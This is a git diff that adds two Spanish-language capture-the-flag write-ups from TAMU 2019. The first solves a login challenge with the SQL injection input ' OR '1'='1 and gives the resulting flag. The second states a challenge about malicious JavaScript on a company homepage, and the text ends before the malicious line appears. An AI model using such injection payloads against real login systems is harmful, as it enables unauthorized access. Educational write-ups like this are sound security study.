diff --git a/2019/tamu/nasc.md b/2019/tamu/nasc.md
new file mode 100644
index 0000000..f0605db
--- /dev/null
+++ b/2019/tamu/nasc.md
@@ -0,0 +1,33 @@
+# Not Another SQLi Challenge
+
+---
+
+(web 100)
+
+
+
+## Desarrollo
+
+Para este problema se realizó una inyección SQL a un portal de login, se
+supuso que la consulta a la base de datos era de las más comunmente empleada,
+y que de igual forma no se realizaba ningún filtrado de caracteres especiales:
+
+```sql
+SELECT * FROM usr WHERE usuario='$usr' AND contrasena='$pswd'
+```
+
+Bastaba con formular una oración como la siguiente:
+
+```sql
+SELECT * FROM usr WHERE usuario='u' AND contrasena='' OR '1' = '1'%%
+```
+Bastó con llenar los campos de la siguiente manera:
+
+Usuario: root
+Paswwrod: ' OR '1'='1
+
+Así se obtuvo la flag:
+
+```
+gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}!
+```
diff --git a/2019/tamu/ointrusion.md b/2019/tamu/ointrusion.md
new file mode 100644
index 0000000..1a4fae9
--- /dev/null
+++ b/2019/tamu/ointrusion.md
@@ -0,0 +1,21 @@
+#
+
+---
+
+(100 drivebyinc)
+
+Welcome to Drive By Inc. We provide all sorts of logistical solutions for our customers. Over the past few years we moved to hosting a large portion of our business on a nice looking website. Recently our customers are complaining that the front page of our website is causing their computers to run extremely slowly. We hope that it is just because we added too much javascript but can you take a look for us just to make sure?
+
+ What is the full malicious line? (Including any HTML tags)
+
+
+## Desarrollo
+
+Revisando el código del sitio web se contró una llmada muy peculiar:
+
+```html
+